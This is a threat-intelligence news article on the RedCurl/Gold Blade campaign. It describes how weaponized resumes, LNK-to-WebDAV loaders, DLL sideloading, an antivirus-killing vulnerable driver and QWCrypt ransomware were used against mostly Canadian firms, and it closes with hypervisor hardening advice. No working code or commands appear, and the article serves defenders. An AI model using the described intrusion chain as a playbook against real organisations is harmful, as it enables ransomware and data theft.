A Canadian organization has emerged as the center of a targeted cyber campaign organized by the threat activity cluster known as STAC6565.
Cybersecurity company Sophos announced that it investigated approximately 40 intrusions linked to this actor between February 2024 and August 2025. This campaign is assessed with high confidence to be an overlap with the hacking group known as Gold Blade, also known as Earth Kapre, RedCurl, and Red Wolf.
The financially motivated attacker is believed to have been active since late 2018, initially targeting organizations in Russia, but has since expanded to include organizations in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the United Kingdom, and the United States. The group has a history of using phishing emails to conduct commercial espionage.
However, a recent wave of attacks revealed that RedCurl was conducting ransomware attacks using a custom-built malware strain called QWCrypt. One notable tool in a threat actor’s arsenal is RedLoader. RedLoader sends information about the infected host to a command and control (C2) server and runs a PowerShell script to gather details related to the compromised Active Directory (AD) environment.
“This attack reflects the group’s unusually narrow geographic focus, with almost 80% of attacks targeting organizations in Canada,” said Sophos researcher Morgan Demboski. “Once primarily focused on cyber espionage, Gold Blade has evolved its operations into a hybrid operation that blends data theft with selective ransomware deployment through a custom locker named QWCrypt.”
Other notable targets include the United States, Australia, and the United Kingdom, with the services, manufacturing, retail, technology, non-governmental organizations, and transportation sectors hardest hit during this period.
The group is said to operate under a “hack-for-hire” model, performing customized intrusions on behalf of clients and deploying ransomware on the side to monetize the intrusions. Group-IB’s 2020 report notes that the group may be a Russian-speaking group, but there is currently no indication to confirm or deny this assessment.
Sophos described RedCurl as a “specialized operation” and said the threat actor’s ability to refine and evolve its methods, as well as its ability to launch low-profile extortion attacks, set it apart from other cybercrime groups. However, there is no evidence to suggest that it is state-sponsored or politically motivated.
The cybersecurity firm also noted that the tempo of activity is marked by periods of inactivity, followed by sudden spikes in attacks using improved tactics, indicating that hacking groups may be using downtime to update their toolsets.
STAC6565 begins with a spear-phishing email targeting human resources (HR) personnel, tricking them into opening a malicious document disguised as a resume or cover letter. Since at least November 2024, this operation has utilized legitimate job search platforms such as Indeed, JazzHR, and ADP WorkforceNow to upload weaponized resumes as part of the job application process.
“Recruiting platforms allow HR professionals to see every resume they receive, so hosting the payload on these platforms and delivering it via a single-use email domain not only increases the likelihood that the document will be opened, but also avoids detection by email-based protections,” Demboski explained.
In one incident, a fake resume uploaded to Indeed was found to redirect users to a booby-trapped URL, ultimately leading to the deployment of QWCrypt ransomware by the RedLoader chain. At least three different RedLoader delivery sequences have been observed in September 2024, March/April 2025, and July 2025. Some aspects of the distribution chain were previously detailed by Huntress, eSentire, and Bitdefender.
A major change observed in July 2025 concerns the use of ZIP archives dropped by fake resumes. Inside the archive there is a Windows shortcut (LNK) that disguises the PDF. The LNK file uses “rundll32.exe” to retrieve a renamed version of “ADNotificationManager.exe” from a WebDAV server hosted behind the Cloudflare Workers domain.
The attack then launches a legitimate Adobe executable to sideload a RedLoader DLL (named “srvcli.dll” or “netutils.dll”) from the same WebDAV path. The DLL connects to an external server, downloads and executes the second stage payload. This payload is a standalone binary that is responsible for connecting to another server and retrieving a third stage standalone executable along with a malicious DAT file and a renamed 7-Zip file.
Both stages rely on Microsoft’s Program Compatibility Assistant (‘pcalua.exe’) to execute the payload. This is an approach we’ve seen in previous campaigns. The only difference is that the payload format has moved to an EXE instead of a DLL in April 2025.
“The payload parses the malicious .dat file and checks internet connectivity. It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system detection,” Sophos said. “The script unzips Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products.”
The execution results are packaged into an encrypted, password-protected 7-Zip archive and transferred to an attacker-controlled WebDAV server. RedCurl has also been observed using open source reverse proxies RPivot and Chisel SOCKS5 for C2 communications.
Another tool used in the attack is a customized version of the Terminator tool that leverages the signed Zemana AntiMalware driver to kill antivirus-related processes, known as the Bring Your Own Vulnerable Driver (BYOVD) attack. In at least one case in April 2025, the attacker renamed both components before distributing them to all servers in the victim environment via an SMB share.
Sophos also noted that the majority of these attacks were detected and mitigated before QWCrypt was installed. However, three of the attacks (one in April 2025 and two in July 2025) were successfully deployed.
“In the April incident, the attackers manually viewed and collected sensitive files and remained inactive for over five days before deploying the lockers,” the report added. “This delay may suggest that the attackers have resorted to ransomware after attempting to monetize the data or failing to secure a buyer.”
QWCrypt deployment scripts are tailored to the target environment and often include a victim-specific ID in the file name. When the script is launched, it checks to see if the Terminator service is running before taking steps to disable recovery and execute ransomware on endpoint devices on the network, including the organization’s hypervisor.
In the final stage, the script runs a cleanup batch script to remove existing shadow copies and all PowerShell console history files, and prevents forensic recovery.
“Gold Blade’s exploitation of its adoption platform, cycles of dormancy and bursting, and continued refinement of its delivery method demonstrate a level of operational maturity not typically associated with financially motivated attackers,” Sophos said. “The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tools and custom binaries to facilitate a multi-step malware delivery chain.”
The disclosure comes as Huntress said it has noticed a significant spike in ransomware attacks against hypervisors, driven largely by Akira Group, from 3% in the first half of this year to 25% so far in the second half of the year.
“Ransomware operators deploy ransomware payloads directly through the hypervisor, completely bypassing traditional endpoint protections,” wrote researchers Anna Pham, Ben Bernstein, and Dray Agha. “In some cases, attackers utilize built-in tools such as OpenSSL to perform virtual machine volume encryption, bypassing the need to upload custom ransomware binaries.”
“This shift highlights a growing and disturbing trend: Attackers are targeting the infrastructure that controls all hosts, and access to the hypervisor allows adversaries to dramatically amplify the impact of their intrusions.”
Given the concentration of threat actors on the hypervisor, we recommend using local ESXi accounts, enforcing multi-factor authentication (MFA), implementing strong password policies, separating hypervisor management networks from production and consumer networks, deploying jump boxes to audit administrator access, restricting access to the control plane, and restricting access to ESXi management interfaces to specific management devices.
Source link
